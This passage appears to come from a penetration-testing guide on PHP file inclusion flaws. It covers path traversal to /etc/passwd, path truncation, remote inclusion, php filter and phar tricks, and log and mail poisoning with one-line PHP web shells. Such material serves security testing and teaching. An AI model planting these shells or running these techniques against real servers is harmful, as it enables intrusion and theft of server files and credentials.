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**Remote File Inclusion (RFI):** The file is loaded from a remote server (Best: You can write the code and the server will execute it). In php this is **disabled** by default (**allow\_url\_include**).\
A list that uses several techniques to find the file /etc/password (to check if the vulnerability exists) can be found [here](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-nix.txt)
A list that uses several techniques to find the file /boot.ini (to check if the vulnerability exists) can be found [here](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-win.txt)
All the examples are for Local File Inclusion but could be applied to Remote File Inclusion also (page=[http://myserver.com/phpshellcode.txt\\](http://myserver.com/phpshellcode.txt\)/).
The file system of a server can be explored recursively to identify directories, not just files, by employing certain techniques. This process involves determining the directory depth and probing for the existence of specific folders. Below is a detailed method to achieve this:
1.**Determine Directory Depth:** Ascertain the depth of your current directory by successfully fetching the `/etc/passwd` file (applicable if the server is Linux-based). An example URL might be structured as follows, indicating a depth of three:
2.**Probe for Folders:** Append the name of the suspected folder (e.g., `private`) to the URL, then navigate back to `/etc/passwd`. The additional directory level requires incrementing the depth by one:
3.**Interpret the Outcomes:** The server's response indicates whether the folder exists:
* **Error / No Output:** The folder `private` likely does not exist at the specified location.
* **Contents of `/etc/passwd`:** The presence of the `private` folder is confirmed.
4.**Recursive Exploration:** Discovered folders can be further probed for subdirectories or files using the same technique or traditional Local File Inclusion (LFI) methods.
For exploring directories at different locations in the file system, adjust the payload accordingly. For instance, to check if `/var/www/` contains a `private` directory (assuming the current directory is at a depth of 3), use:
Path truncation is a method employed to manipulate file paths in web applications. It's often used to access restricted files by bypassing certain security measures that append additional characters to the end of file paths. The goal is to craft a file path that, once altered by the security measure, still points to the desired file.
The provided examples demonstrate how to utilize path truncation to access `/etc/passwd`, a common target due to its sensitive content (user account information):
* **Using Dot Segments and Additional Characters**: Traversal sequences (`../`) combined with extra dot segments and characters can be used to navigate the file system, effectively ignoring appended strings by the server.
* **Determining the Required Number of Traversals**: Through trial and error, one can find the precise number of `../` sequences needed to navigate to the root directory and then to `/etc/passwd`, ensuring that any appended strings (like `.php`) are neutralized but the desired path (`/etc/passwd`) remains intact.
* **Starting with a Fake Directory**: It's a common practice to begin the path with a non-existent directory (like `a/`). This technique is used as a precautionary measure or to fulfill the requirements of the server's path parsing logic.
When employing path truncation techniques, it's crucial to understand the server's path parsing behavior and filesystem structure. Each scenario might require a different approach, and testing is often necessary to find the most effective method.
In php this is disable by default because **`allow_url_include`** is **Off.** It must be **On** for it to work, and in that case you could include a PHP file from your server and get RCE:
If for some reason **`allow_url_include`** is **On**, but PHP is **filtering** access to external webpages, [according to this post](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64/), you could use for example the data protocol with base64 to decode a b64 PHP code and egt RCE:
In the previous code, the final `+.txt` was added because the attacker needed a string that ended in `.txt`, so the string ends with it and after the b64 decode that part will return just junk and the real PHP code will be included (and therefore, executed).
{% endhint %}
Another example **not using the `php://` protocol** would be:
It looks like if you have a Path Traversal in Java and you **ask for a directory** instead of a file, a **listing of the directory is returned**. This won't be happening in other languages (afaik).
Here’s list of top 25 parameters that could be vulnerable to local file inclusion (LFI) vulnerabilities (from [link](https://twitter.com/trbughunters/status/1279768631845494787)):
*`convert.iconv.*` : Transforms to a different encoding(`convert.iconv.<input_enc>.<output_enc>`) . To get the **list of all the encodings** supported run in the console: `iconv -l`
Abusing the `convert.iconv.*` conversion filter you can **generate arbitrary text**, which could be useful to write arbitrary text or make a function like include process arbitrary text. For more info check [**LFI2RCE via php filters**](lfi2rce-via-php-filters.md).
### Using php filters as oracle to read arbitrary files
[**In this post**](https://www.synacktiv.com/publications/php-filter-chains-file-read-from-error-based-oracle) is proposed a technique to read a local file without having the output given back from the server. This technique is based on a **boolean exfiltration of the file (char by char) using php filters** as oracle. This is because php filters can be used to make a text larger enough to make php throw an exception.
In the original post you can find a detailed explanation of the technique, but here is a quick summary:
* Use the codec **`UCS-4LE`** to leave leading character of the text at the begging and make the size of string increases exponentially.
* This will be used to generate a **text so big when the initial letter is guessed correctly** that php will trigger an **error**
* The **dechunk** filter will **remove everything if the first char is not an hexadecimal**, so we can know if the first char is hex.
* This, combined with the previous one (and other filters depending on the guessed letter), will allow us to guess a letter at the beggining of the text by seeing when we do enough transformations to make it not be an hexadecimal character. Because if hex, dechunk won't delete it and the initial bomb will make php error.
* The codec **convert.iconv.UNICODE.CP930** transforms every letter in the following one (so after this codec: a -> b). This allow us to discovered if the first letter is an `a` for example because if we apply 6 of this codec a->b->c->d->e->f->g the letter isn't anymore a hexadecimal character, therefore dechunk doesn't deleted it and the php error is triggered because it multiplies with the initial bomb.
* Using other transformations like **rot13** at the beginning it’s possible to leak other chars like n, o, p, q, r (and other codecs can be used to move other letters to the hex range).
* When the initial char is a number it’s needed to base64 encode it and leak the 2 first letters to leak the number.
* The final problem is to see **how to leak more than the initial letter**. By using order memory filters like **convert.iconv.UTF16.UTF-16BE, convert.iconv.UCS-4.UCS-4LE, convert.iconv.UCS-4.UCS-4LE** is possible to change the order of the chars and get in the first position other letters of the text.
* And in order to be able to obtain **further data** the idea if to **generate 2 bytes of junk data at the beginning** with **convert.iconv.UTF16.UTF16**, apply **UCS-4LE** to make it **pivot with the next 2 bytes**, and d**elete the data until the junk data** (this will remove the first 2 bytes of the initial text). Continue doing this until you reach the disired bit to leak.
In the post a tool to perform this automatically was also leaked: [php\_filters\_chain\_oracle\_exploit](https://github.com/synacktiv/php\_filter\_chains\_oracle\_exploit).
You can also use **php://stdin, php://stdout and php://stderr** to access the **file descriptors 0, 1 and 2** respectively (not sure how this could be useful in an attack)
A `.phar` file can be utilized to execute PHP code when a web application leverages functions such as `include` for file loading. The PHP code snippet provided below demonstrates the creation of a `.phar` file:
Upon execution, a file named `test.phar` will be created, which could potentially be leveraged to exploit Local File Inclusion (LFI) vulnerabilities.
In cases where the LFI only performs file reading without executing the PHP code within, through functions such as `file_get_contents()`, `fopen()`, `file()`, `file_exists()`, `md5_file()`, `filemtime()`, or `filesize()`, exploitation of a deserialization vulnerability could be attempted. This vulnerability is associated with the reading of files using the `phar` protocol.
It was possible to abuse **any arbitrary file read from PHP that supports php filters** to get a RCE. The detailed description can be [**found in this post**](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1)**.**\
Very quick summary: a **3 byte overflow** in the PHP heap was abused to **alter the chain of free chunks** of anspecific size in order to be able to **write anything in any address**, so a hook was added to call **`system`**.\
It was possible to alloc chunks of specific sizes abusing more php filters.
* [php://memory and php://temp](https://www.php.net/manual/en/wrappers.php.php#wrappers.php.memory) — Write in memory or in a temporary file (not sure how this can be useful in a file inclusion attack)
Local File Inclusion (LFI) risks in PHP are notably high when dealing with the 'assert' function, which can execute code within strings. This is particularly problematic if input containing directory traversal characters like ".." is being checked but not properly sanitized.
While this aims to stop traversal, it inadvertently creates a vector for code injection. To exploit this for reading file contents, an attacker could use:
This technique is relevant in cases where you **control** the **file path** of a **PHP function** that will **access a file** but you won't see the content of the file (like a simple call to **`file()`**) but the content is not shown.
In [**this incredible post**](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html) it's explained how a blind path traversal can be abused via PHP filter to **exfiltrate the content of a file via an error oracle**.
As sumary, the technique is using the **"UCS-4LE" encoding** to make the content of a file so **big** that the **PHP function opening** the file will trigger an **error**.
Then, in order to leak the first char the filter **`dechunk`** is used along with other such as **base64** or **rot13** and finally the filters **convert.iconv.UCS-4.UCS-4LE** and **convert.iconv.UTF16.UTF-16BE** are used to **place other chars at the beggining and leak them**.
If the Apache or Nginx server is **vulnerable to LFI** inside the include function you could try to access to **`/var/log/apache2/access.log` or `/var/log/nginx/access.log`**, set inside the **user agent** or inside a **GET parameter** a php shell like **`<?php system($_GET['c']); ?>`** and include that file
Note that **if you use double quotes** for the shell instead of **simple quotes**, the double quotes will be modified for the string "_**quote;**_", **PHP will throw an error** there and **nothing else will be executed**.
Also, make sure you **write correctly the payload** or PHP will error every time it tries to load the log file and you won't have a second opportunity.
This could also be done in other logs but **be careful,** the code inside the logs could be URL encoded and this could destroy the Shell. The header **authorisation "basic"** contains "user:password" in Base64 and it is decoded inside the logs. The PHPShell could be inserted inside this header.\
**Send a mail** to a internal account (user@localhost) containing your PHP payload like `<?php echo system($_REQUEST["cmd"]); ?>` and try to include to the mail of the user with a path like **`/var/mail/<USERNAME>`** or **`/var/spool/mail/<USERNAME>`**
2. Include [http://example.com/index.php?page=/proc/$PID/fd/$FD](http://example.com/index.php?page=/proc/$PID/fd/$FD), with $PID = PID of the process (can be brute forced) and $FD the file descriptor (can be brute forced too)
The logs for the FTP server vsftpd are located at _**/var/log/vsftpd.log**_. In the scenario where a Local File Inclusion (LFI) vulnerability exists, and access to an exposed vsftpd server is possible, the following steps can be considered:
As shown in [this](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64) article, PHP base64 filter just ignore Non-base64.You can use that to bypass the file extension check: if you supply base64 that ends with ".php", and it would just ignore the "." and append "php" to the base64. Here is an example payload:
This [**writeup** ](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)explains that you can use **php filters to generate arbitrary content** as output. Which basically means that you can **generate arbitrary php code** for the include **without needing to write** it into a file.
**Upload** a file that will be stored as **temporary** in `/tmp`, then in the **same request,** trigger a **segmentation fault**, and then the **temporary file won't be deleted** and you can search for it.
If you found a **Local File Inclusion** even if you **don't have a session** and `session.auto_start` is `Off`. If you provide the **`PHP_SESSION_UPLOAD_PROGRESS`** in **multipart POST** data, PHP will **enable the session for you**. You could abuse this to get RCE:
If you found a **Local File Inclusion** and you **can exfiltrate the path** of the temp file BUT the **server** is **checking** if the **file to be included has PHP marks**, you can try to **bypass that check** with this **Race Condition**:
If you can abuse the LFI to **upload temporary files** and make the server **hang** the PHP execution, you could then **brute force filenames during hours** to find the temporary file:
If you include any of the files `/usr/bin/phar`, `/usr/bin/phar7`, `/usr/bin/phar.phar7`, `/usr/bin/phar.phar`. (You need to include the same one 2 time to throw that error).
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